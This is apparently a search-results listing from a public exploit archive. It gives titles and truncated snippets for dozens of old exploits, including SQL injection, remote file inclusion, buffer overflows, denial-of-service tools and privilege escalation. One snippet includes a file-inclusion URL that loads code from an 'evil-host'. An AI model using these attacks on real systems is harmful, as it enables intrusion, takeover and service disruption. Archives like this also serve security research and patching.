41207 matches found
e-Vision CMS 2.0 - all_users.php SQL Injection
e-Vision CMS 2.0 - allusers.php SQL Injection !/usr/bin/php -q -d shortopentag=on / / site: http://www.soqor.net /'; if $argc0 Echo trim$var1; $page = getpage$url.$exploit; $page2 = getpage$url.$exploit2; ifpregmatch'/.+?/is',$page Echo "\n+...
osCommerce 2.12.2 - product_info.php SQL Injection
osCommerce 2.12.2 - productinfo.php SQL Injection source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the...
Integramod Portal 2.0 rc2 - phpbb_root_path Remote File Inclusion
Integramod Portal 2.0 rc2 - phpbbrootpath Remote File Inclusion matasanos Integramod Portal 2.x File Inclusion Vulnerabilities affected software: Integramod Portal vendor: Integramod . you can donwload it from http://www.integramod.com level: Highly Critical muy critico...
VistaBB 2.x - functions_mod_user.php Remote File Inclusion
VistaBB 2.x - functionsmoduser.php Remote File Inclusion !/usr/bin/perl Method found and exploit scripted by nukedx Contacts ICQ: 10072 Web: http://www.nukedx.com MAIL/MSN: [email protected] Original advisory can be found at: http://www.nukedx.com/?viewdoc=48 VistaBB Copyright 2006 C nukedx Greet...
Mambo Component Rssxt 1.0 - MosConfig_absolute_path Multiple Remote File Inclusions
Mambo Component Rssxt 1.0 - MosConfigabsolutepath Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/19593/info The Mambo Rssxt component for Joomla and Mambo is prone multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An...
OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)
OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows PoC / by Luigi Auriemma / include include include include ifdef WIN32 include // htonl else include endif define VER "0.1" define HEAPOVERSZ 512 define ITPHEAPOVERSZ 150000 define ALLOCSAMPLESZ 39 & 7 + 16 define SONGITPROJECT 0x20000 void...
DConnect Daemon DC Chat - Denial of Service
DConnect Daemon DC Chat - Denial of Service source: https://www.securityfocus.com/bid/19370/info DConnect Daemon is prone to a denial-of-service vulnerability. This issue occurs because the application fails to handle null-pointer exceptions properly. An attacker can exploit this issue to crash t...
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution
Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution // MoBB Demonstration function Demo // Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html // https://bugzilla.mozilla.org/showbug.cgi?id=342267 // CVE-2006-3677 // The Java plugin is required for this to...
QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow
QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow Proof of concept not for "in the wild" kiddies QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 german by kcope in 2006 use IO::Socket; if $ARGV0 eq "" print "param1 = remote host"; exit; win32bind - EXITFUNC=seh...
dotWidget for articles 2.0 - showarticle.php?file_path Remote File Inclusion
dotWidget for articles 2.0 - showarticle.php?filepath Remote File Inclusion source: https://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied...
panic-reloaded - TCP Denial of Service Tool
panic-reloaded - TCP Denial of Service Tool / ----------------------------------------------------------------------------- / \ / / / / / / / / / / / / / / / / / // / / // / / / / // // // / / / / / / // // ,/ ,/ // / Security Community...
Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities
Matt Wright Guestbook 2.3.1 - Guestbook.pl Multiple HTML Injection Vulnerabilities source: https://www.securityfocus.com/bid/17438/info Guestbook is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically...
MySQL 4.x5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)
MySQL 4.x5.0 Linux - User-Defined Function UDF Dynamic Library 2 / $Id: raptorudf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $ raptorudf2.c - dynamic library for dosystem MySQL UDF Copyright c 2006 Marco Ivaldi This is an helper dynamic library for local privilege escalation through MySQL run with...
Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)
Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Denial of Service // // Cisco Killer - ciskill.c // // Usage: ./ciskill device // // Author: Pasv pasvninja at gmail.com // // Credit: This exploit takes advantage of a vulnerability that was // discovered by Eric Smith on January 12,...
EZDatabase 2.1.1 - index.php Cross-Site Scripting
EZDatabase 2.1.1 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/16257/info EZDatabase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to ha...
SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection
SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize...
Microsoft Windows Metafile - mtNoObjects Denial of Service (MS05-053)
Microsoft Windows Metafile - mtNoObjects Denial of Service MS05-053 / Author: Winny Thomas Pune, INDIA The crafted metafile WMF from this code when viewed in explorer crashes it. The issue is seen when the field 'mtNoObjects' in the Metafile header is set to 0x0000. The code was tested on Windows...
PBLang 4.65 - Remote Command Execution (2)
PBLang 4.65 - Remote Command Execution 2 php.exe ..\www\r57pblang465.php localhost /pbl/ "pblcookie732128=Pe ng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;" Peng0 PrSrS $ARGV = $SERVER'argv'; global $ARGV; ifcount$ARGV == 0 echo...
K-COLLECT CSV_DB.CGI 1.0i_DB.CGI 1.0 - Remote Command Execution
K-COLLECT CSVDB.CGI 1.0iDB.CGI 1.0 - Remote Command Execution // source: https://www.securityfocus.com/bid/14059/info CSVDB.CGI/iDB.CGI are affected by a remote command execution vulnerability. Specifically, an attacker can supply arbitrary commands prefixed with the '|' character through the...
BEA WebLogic 7.08.1 - Administration Console LoginForm.jsp Cross-Site Scripting
BEA WebLogic 7.08.1 - Administration Console LoginForm.jsp Cross-Site Scripting source: https://www.securityfocus.com/bid/13793/info BEA WebLogic Server And WebLogic Express are affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitiz...
AIX 5.1 Bellmail - Local Race Condition
AIX 5.1 Bellmail - Local Race Condition -bash-2.05b$ -bash-2.05b$ cat xaix5bellmail.pl !/usr/bin/perl FileName: xaix5bellmail.pl Exploit "Race condition vulnerability BUGTRAQ ID: 8805" of /usr/bin/bellmail command on Aix5 to change any file owner to current user. Usage : xaix5bellmail.pl aimfile...
Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Privilege Escalation (1)
Linux Kernel 2.6.x - SYSEPollWait Local Integer Overflow Local Privilege Escalation 1 / EDB Note: Updated exploit can be found here; https://www.exploit-db.com/exploits/25203/ source: https://www.securityfocus.com/bid/12763/info A Local integer overflow vulnerability affects the Linux kernel. Thi...
PostNuke Phoenix 0.7x - CATID SQL Injection
PostNuke Phoenix 0.7x - CATID SQL Injection source: https://www.securityfocus.com/bid/12683/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. It is reported that issue presents itself when maliciou...
Microsoft Internet Explorer - .ANI Downloader (MS05-002)
Microsoft Internet Explorer - .ANI Downloader MS05-002 / Modified by Vertygo aka Ivanm [email protected] all credits goes to houseofdabus Berend-Jan Wever and to milw0rm/ / Added string.h /str0ke / / HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2 Copyright c 2004-2005 houseofdabus. MS05-002...
Webmin 1.5 - Web Brute Force (CGI)
Webmin 1.5 - Web Brute Force CGI !/usr/bin/perl use CGI qw:standard; use IO::Socket; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $host = $CGI-param"host"; $wlist = $CGI-param"wlist"; $cmd = $CGI-param"cmd"; print $CGI-header-type='text/html',-charset='windows-1254'; print...
Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing
Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing Advisory Information ------------------------- Software Package : Hosting Controller Vendor Homepage : http://www.hostingcontroller.com Platforms : Windows based servers Vulnerable Versions : All version Tested on: v.6.1 Hotfix 1.4 Vendor...
phpBB 2.0.x - admin_cash.php PHP Remote File Inclusion
phpBB 2.0.x - admincash.php PHP Remote File Inclusion source: https://www.securityfocus.com/bid/11701/info A vulnerability is reported to exist in the phpBB CashMod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system...
AlShare Software NetNote Server 2.2 - Remote Denial of Service
AlShare Software NetNote Server 2.2 - Remote Denial of Service // source: https://www.securityfocus.com/bid/11677/info NetNote server is reported prone to a remote denial of service vulnerability. This issue occurs because the application does not handle exceptional conditions properly. NetNote...
Veritas NetBackup - Remote Command Execution (Metasploit)
Veritas NetBackup - Remote Command Execution Metasploit $Id: veritasnetbackupcmdexec.rb 10617 2010-10-09 06:55:52Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more...
ocPortal 1.0.3 - Remote File Inclusion
ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ?...
Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)
Microsoft Windows - JPEG GDI+ Remote Heap Overflow MS04-028 / GDI+ JPEG Remote Exploit By John Bissell A.K.A. HighT1mes Exploit Name: ============= JpegOfDeath.c v0.5 Date Exploit Released: ====================== Sep, 23, 2004 Description: ============ Exploit based on FoToZ exploit but kicks the...
Polar Helpdesk 3.0 - Cookie Based Authentication Bypass
Polar Helpdesk 3.0 - Cookie Based Authentication Bypass source: https://www.securityfocus.com/bid/10775/info Polar Helpdesk is reported prone to a cookie based authentication system bypass vulnerability. It is reported that the authentication and privilege system for Polar Helpdesk is based...
WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)
WebSTAR FTP Server 5.3.2 OSX - USER Overflow Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
CVS (LinuxFreeBSD) - Remote Entry Line Heap Overflow
CVS LinuxFreeBSD - Remote Entry Line Heap Overflow include include include include include include include include include include include include include include typedef unsigned char uchar; void progressvoid; int brutecvsrootvoid; int bruteusernamevoid; int brutepasswordvoid; void hdlcrashedint...
HelpCenter Live! 1.2.7 - Multiple Vulnerabilities
HelpCenter Live! 1.2.7 - Multiple Vulnerabilities HelpCenter Live! Multiple Vulnerabilities Vendor: Michael Bird Product: HelpCenter Live! Version: = 1.2.7 Website: http://www.helpcenterlive.com/ BID: 13666 13667 CVE: CVE-2005-1672 CVE-2005-1673 CVE-2005-1674 OSVDB: 16651 16652 16653 16654 16655...
Microsoft Windows - ASN.1 Remote (MS04-007)
Microsoft Windows - ASN.1 Remote MS04-007 Microsoft ASN.1 remote exploit for CVE-2005-1935 // MS04-007 Solar Eclipse solareclipse at phreedom dot org https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3022.tar.gz 12262006-killbill.tar.gz milw0rm.com 2004-03-26...
Linux Kernel 2.2.252.4.242.6.2 - mremap() Validator
Linux Kernel 2.2.252.4.242.6.2 - mremap Validator / Proof-of-concept exploit code for domremap 2 EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "domremap 1". EDB Note: This will just "test" the vulnerability. A exploit version c...
Pine 4.56 - Remote Buffer Overflow
Pine 4.56 - Remote Buffer Overflow / Mon Sep 15 09:35:01 CEST 2003 remote? Pine eip/ebp this can actually be "bruteforced" I didn't show this since this is a PoC and uses "exact offsets" All u do is supply multiple charsets and overwrite larger areas of memory This makes method 1 100% successfull...
FTP Service 1.2 - Multiple Vulnerabilities
FTP Service 1.2 - Multiple Vulnerabilities FTP Service Multiple Vulnerabilities Vendor: Pablo Software Solutions Product: FTP Service Version: = 1.2 Website: http://www.pablovandermeer.nl/ftpservice.html BID: 7799 7801 Description: FTPService.exe is a service-version of Pablo's FTP Server. This...
OpenSSHPAM 3.6.1p1 - Remote Users Discovery Tool
OpenSSHPAM 3.6.1p1 - Remote Users Discovery Tool / SSHBRUTE - OpenSSH/PAM Proof of concept code by Maurizio Agazzini Tested against Red Hat, Mandrake, and Debian GNU/Linux. Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt $ tar xvfz openssh-3.6.1p1.tar.gz $ patch -p0 include...
CesarFTP 0.99 g - Remote CWD Denial of Service
CesarFTP 0.99 g - Remote CWD Denial of Service source: https://www.securityfocus.com/bid/7950/info A vulnerability has been reported for CesarFTP. Reportedly, an attacker may crash a target server by supplying excessive data as the argument to the 'CWD' command. This may result in the server...
PHP 4 - PHPInfo() Cross-Site Scripting
PHP 4 - PHPInfo Cross-Site Scripting source: https://www.securityfocus.com/bid/7805/info Scripts that include the PHP phpinfo debugging function may be prone to cross-site scripting attacks. This could permit remote attackers to create a malicious link to a vulnerable PHP script that includes...
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error (3)
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error 3 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error (2)
Microsoft Windows XP2000NT 4.0 - Window Message Subsystem Design Error 2 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow
Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow // source: https://www.securityfocus.com/bid/5188/info The Microsoft Foundation Class Library is a library used to develop applications for Microsoft Windows. Some versions of the MFC include an ISAPI class, which can be used to...
Microsoft Windows Server 2000 - Lanman Denial of Service (1)
Microsoft Windows Server 2000 - Lanman Denial of Service 1 // source: https://www.securityfocus.com/bid/4532/info An issue has been discovered in Windows 2000, which could cause a denial of system services. Submitting malformed data to port 445 could cause the Lanman service to consume high CPU a...
DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)
DC Scripts DCShop Beta 1.0 02 - File Disclosure 1 source: https://www.securityfocus.com/bid/2889/info DCShop is a GCI-based ecommerce system from DCScripts. Under certain configurations, a beta version of this product can allow a remote user to request and obtain files containing confidential ord...
NTPd - Remote Buffer Overflow
NTPd - Remote Buffer Overflow // source: https://www.securityfocus.com/bid/2540/info NTP, the Network Time Protocol, is used to synchronize the time between a computer and another system or time reference. It uses UDP as a transport protocol. There are two protocol versions in use: NTP v3 and NTP...
Ethereal - AFS Buffer Overflow
Ethereal - AFS Buffer Overflow / source: https://www.securityfocus.com/bid/1972/info Ethereal is a network auditing utility originally written by Gerald Combs. A problem exists in the Ethereal package which can allow a remote user to execute code. The problem exists in the AFS packet parsing...
SUIDPerl 5.00503 - Mail Shell Escape (2)
SUIDPerl 5.00503 - Mail Shell Escape 2 source: https://www.securityfocus.com/bid/1547/info The interaction between some security checks performed by suidperl, the setuid version of perl, and the /bin/mail program creates a scenario that allows local malicious users to execute commands with root...